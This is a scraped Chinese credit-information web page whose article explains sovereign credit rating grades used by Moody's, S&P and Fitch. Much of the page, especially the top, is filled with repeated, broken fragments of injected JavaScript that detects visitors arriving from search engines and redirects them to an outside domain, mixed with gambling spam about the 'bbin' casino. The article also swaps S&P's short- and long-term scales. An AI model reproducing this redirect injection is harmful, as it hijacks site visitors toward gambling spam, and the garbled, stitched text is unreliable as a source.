if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || bbin浏览器官方网
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} ||
  【繁體中文】   【加入收藏】  【設為首頁】  【關于我們】
主權信用評級分為哪些級別|信用知識|河南信用查詢網
當前位置:網站首頁 >> 信用知識
   
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://naibi8.com/?1923057"} ||
信用知識
主權信用評級分為哪些級別
2012-7-22    來源:    作者:佚名  瀏覽次數:3659
 穆迪將西班牙的主權信用評級從“Aa2”下調至“A1”,請問什么是主權信用評級?分為哪幾級?

  湖北讀者:柳念

  主權信用評級是信用評級機構對主權國家對外經濟信用的一種評價,主要反映該國政府作為債務人,對內對外償付自身債務的能力和意愿,并按照一定的分級標準將其形象化、可衡量化。

  當今世界各國的商業評級公司都有權給出主權信用評級,不過,只有國際上相對權威的,在規模審計和信用評價方面具有豐富經驗的信用評級機構所作出的主權信用評級才被公眾輿論認可。目前公認的主權信用評級三大機構為美國的標準普爾、穆迪和惠譽。

  主權信用評級的表示方法在各個商業評級公司各有不同,一般單獨用字母或配合數字來表示。以三大評級機構為例,穆迪的長期主權信用等級表示法從AAA一直到C共21級,從高到底分別為AAA、Aa1、Aa2、Aa3、A1、A2、A3、Baa1、Baa2、Baa3、Ba1、Ba2、Ba3、B1、B2、B3、Caa1、Caa2、Caa3、Ca和C級,短期主權信用評級則為P-1、P-2、P-3和未分級,長期和短期信用等級有一定對應關系。標普的短期分級表示分21級從高到低分別為AAA、AA+、AA、AA-、A+、A、A-、BBB+、BBB、BBB-、BB+、BB、B+、B、B-、CCC+、CCC、CCC-、CC、C和D,長期分級為A-1+、A-1、A-2、A-3、B和C,惠譽的分級方法和標普類似,只是長期分級中C級未作進一步細分,而長期分級中則由F級來代替A級。

  總體上說,這些分級一般都分為兩個大的級別,即投資級別和投機級別,前者表明該國主權信用等級高,債務無風險,后者表示風險較大,債務償付可能得不到保證。

上一篇: 查詢數據的時候發現錯誤,請檢查您的查詢代碼是否正確。bbin为什么下大就输